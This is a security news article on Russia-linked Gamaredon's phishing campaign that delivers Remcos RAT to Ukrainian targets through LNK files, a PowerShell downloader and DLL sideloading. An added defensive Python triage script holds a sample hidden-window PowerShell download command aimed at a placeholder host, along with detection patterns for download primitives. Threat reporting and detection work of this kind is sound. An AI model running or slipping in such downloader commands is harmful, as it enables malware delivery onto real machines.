Russia-linked Gamaredon Targets Ukraine with Remcos RAT

Researchers at Cisco Talos have detected a cyberespionage campaign targeting Ukrainian entities, carried out by the Russia-linked APT group Gamaredon. The attackers have been using phishing emails to deploy the Remcos RAT (Remote Access Trojan) via a PowerShell downloader, relying on troop-related lures to gain access to the victims' systems.

Gamaredon, also known as Armageddon, Primitive Bear, ACTINIUM, or Callisto, has been launching cyber-espionage campaigns against Ukraine since at least 2014. This latest campaign has been active since November 2024 and involves distributing LNK files compressed inside ZIP archives, often disguised as Office documents and carrying file names related to the military invasion.

The malicious LNK files contain PowerShell code that downloads the next-stage payload together with a decoy file to disguise the infection. The attackers have historically relied on custom scripts and tools, but have recently been observed employing the Remcos backdoor in their campaigns. The attack involves downloading a ZIP payload from the attackers' servers, extracting it to the %TEMP% folder, and executing a seemingly clean application that loads a malicious DLL via DLL sideloading.

The ZIP files fetched by the PowerShell scripts contain a mix of clean and malicious files, consistent with the abuse of legitimate applications for DLL sideloading. For example, one sample downloaded via "Any.run" contains the clean application TivoDiag.exe together with two DLLs, one of them the malicious "mindclient.dll". This DLL is loaded by "TivoDiag.exe" during execution, showing a deliberate effort to disguise the malicious component as part of a legitimate application.
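As an added illustration that is not part of the Talos report or this article, the following Python triage helper runs two defender-side checks over constructed Sysmon-style events shaped like the chain described above: PowerShell launched from the shell with a download primitive (how a double-clicked LNK appears in process-creation telemetry), and a DLL loaded from the same %TEMP% directory as the executable loading it. The event field names, sample paths and the placeholder URL are assumptions.

```python
import re

# Constructed Sysmon-style events (not taken from the Talos report): one process
# creation (Event ID 1) and two image loads (Event ID 7). Paths and URL are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -c "(New-Object Net.WebClient)'
                r'.DownloadFile(\"http://example.invalid/p.zip\", $env:TEMP)"'},
    {"id": 7, "image": r"C:\Users\victim\AppData\Local\Temp\app\TivoDiag.exe",
     "loaded": r"C:\Users\victim\AppData\Local\Temp\app\mindclient.dll"},
    {"id": 7, "image": r"C:\Program Files\Vendor\tool.exe",      # benign control event
     "loaded": r"C:\Windows\System32\kernel32.dll"},
]

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|"
                         r"Net\.WebClient|Start-BitsTransfer", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\b", re.IGNORECASE)

def is_shell_spawned_downloader(ev):
    """Event ID 1: PowerShell started by explorer.exe (a user double-click, e.g. on an
    LNK) whose command line combines a download primitive with a window-hiding or
    encoded-command switch."""
    if ev.get("id") != 1 or not ev["image"].lower().endswith("\\powershell.exe"):
        return False
    if not ev["parent"].lower().endswith("\\explorer.exe"):
        return False
    return bool(DOWNLOAD_RE.search(ev["cmdline"]) and HIDDEN_RE.search(ev["cmdline"]))

def is_temp_sideload(ev):
    """Event ID 7: an executable running out of %TEMP% loads a DLL that sits beside it
    in the same %TEMP% directory, the TivoDiag.exe / mindclient.dll pattern."""
    if ev.get("id") != 7:
        return False
    image, loaded = ev["image"], ev["loaded"]
    if not (TEMP_RE.search(image) and TEMP_RE.search(loaded)):
        return False
    return image.rsplit("\\", 1)[0].lower() == loaded.rsplit("\\", 1)[0].lower()

def triage(events):
    """Return (rule_name, offending_path) tuples for every event that trips a rule."""
    hits = []
    for ev in events:
        if is_shell_spawned_downloader(ev):
            hits.append(("powershell_downloader_from_shell", ev["image"]))
        if is_temp_sideload(ev):
            hits.append(("dll_sideload_from_temp", ev["loaded"]))
    return hits

if __name__ == "__main__":
    for rule, path in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {path}")
```

Both rules are deliberately narrow; in production they would feed a correlation that joins the PowerShell download with the later image load in the same %TEMP% directory rather than firing independently.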

Interestingly, the servers hosting the ZIP files only respond to requests originating from Ukraine, while connections from Germany and Russia receive HTTP 403 errors, possibly to restrict access to Ukrainian victims. Researchers also noticed that the servers were still hosting files for specific regions, suggesting a targeted approach by the attackers.

Threat Actor Profile

Gamaredon is a highly sophisticated APT group known for its long series of spear-phishing attacks targeting Ukrainian entities and organizations related to Ukrainian affairs. The attackers have been launching cyber-espionage campaigns against Ukraine since at least 2014, indicating a high level of expertise and resources.

Indicators of Compromise (IoCs) and Detection

Cisco Talos has included Indicators of Compromise (IoCs) for this threat in their report, as well as Snort rules for its detection. These IoCs can help organizations identify potential threats and take proactive measures to protect themselves.

Conclusion

The recent campaign by Gamaredon highlights the evolving nature of cyberespionage threats. As attackers continue to adapt and evolve their tactics, it is essential for organizations to remain vigilant and implement robust security measures to detect and prevent such attacks. By staying informed about emerging threats like Remcos RAT, organizations can better protect themselves against sophisticated cyberattacks.
